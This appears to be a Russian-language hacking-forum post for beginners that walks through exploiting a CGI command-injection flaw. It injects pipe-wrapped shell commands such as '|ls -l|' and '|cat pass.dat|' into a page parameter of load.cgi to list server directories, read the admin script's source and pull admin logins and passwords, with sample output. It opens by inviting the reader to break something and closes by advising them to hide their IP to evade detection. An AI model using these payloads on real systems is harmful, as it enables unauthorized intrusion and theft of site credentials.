sverige.sega.ex
Сообщений: 28
Оценки: 0
Присоединился: 2009-02-10 13:52:40.290000
|
Хочется что поломать? Попробуй метод атаки на cgi.
Сейчас попытаюсь показать пример использования cgi баги.
Если ты оказался на сайте и видишь в бродилке своего браузера такую форму:
http://www.mysite.ru/cgi-bin/load.cgi?page=news
то можно опробовать на содержание баги.
Для этого измени адрес вызываемой страницы с news на |ls -l|
Получается так:
http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l|
Если есть бага, и всё правильно то примерно ответ будет такой:
total 240 -rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 Docs.cgi -rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 Hints.dat -rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load.cgi -rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 Load.cgi.old -rwxr-xr-x 1 tqlib tqlib 1255 Aug 18 2001 Logos.cgi -rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 SearchPages.dat -rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat -rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat -rwxr-xr-x 1 tqlib tqlib 164 Oct 1 2002 data4.dat -rwxr-xr-x 1 tqlib tqlib 2 Sep 3 2001 hintnumber.dat drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard -rw-r–r– 1 tqlib tqlib 0 Apr 28 2005 open.php drwxr-xr-x 2 tqlib tqlib 4096 Feb 23 2001 tqscripts
Это набросок.
Открываем исходный код страницы и видим уже вот так:
total 240
-rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 Docs.cgi
-rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 Hints.dat
-rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load.cgi
-rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 Load.cgi.old
-rwxr-xr-x 1 tqlib tqlib 1255 Aug 18 2001 Logos.cgi
-rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 SearchPages.dat
-rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat
-rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat
-rwxr-xr-x 1 tqlib tqlib 164 Oct 1 2002 data4.dat
-rwxr-xr-x 1 tqlib tqlib 2 Sep 3 2001 hintnumber.dat
drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard
-rw-r–r– 1 tqlib tqlib 0 Apr 28 2005 open.php
drwxr-xr-x 2 tqlib tqlib 4096 Feb 23 2001 tqscripts
если присмотреться видно строку drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard
Теперь делаем так:
Мы находимся по ссылке http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l| теперь лезим в "админский стол" (везде бывает по разному). Вписываем адрес "столика" получится так:
http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l./../adminboard|
Вот мы уже тама. Теперь видишь списочек.
К примеру:
-rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 htdocs
-rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 admin
-rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 counter.dat
-rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load
-rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 style.cgi
-rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 Useribfo.dat
-rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat
-rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat
Вот пример того что там может быть.
Из них заходим в htdocs (htdocs эта директория сайта где лежат страницы того же сайта)
Получится так:
http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l./../adminboard/htdocs|
Зашли и теперь пытаемся найти страницу с админкой. Она бывает обычно anload.cgi или admin.cgi
Нашли? (Для того что бы проверить проверить откройте ту пагу в вкладке. Пага должна просить пароли и логин)
Теперь мы нашли пагу с именем adminsite.cgi
Открываем новое окно и пишем туда:
www.mysite.ru/cgi-bin/load?page= и добовляем вот это |cat adminsite.cgi|
Получится так:
www.mysite.ru/cgi-bin/load?page=|cat adminsite.cgi|
Видим туже админ пагу только уже со знаками и всеми причудами cgi.
Открываем исходник паги и высматриваем слудещее:
pass=
login=
присмотритесь, увидите что пасы и логины проверяются в какой то форме.
Обычно бывает это форма pass.dat или login.dat
Теперь проверим начинку етого самого pass.dat
Пшием в бродилку вот так:
www.mysite.ru/cgi-bin/load?page=|cat pass.dat|
Теперь смотрим исходник полученной нами паги.
И немного полистав, увидим пароль и логин к админке.
Вот пожалуй и всё!
ВНИМАНИЕ!!!
Не все админы бывают тупые…При проделке этого фокуса, вас смогут легко вычеслить по вашему IP адресу.
Прежде чем делать это всё подумай (или просто установи себе проггу для скрытия реального IP :))
Всем удачи в начинаниях!
|
Для начинающих от ][f1gh('10'){R - 
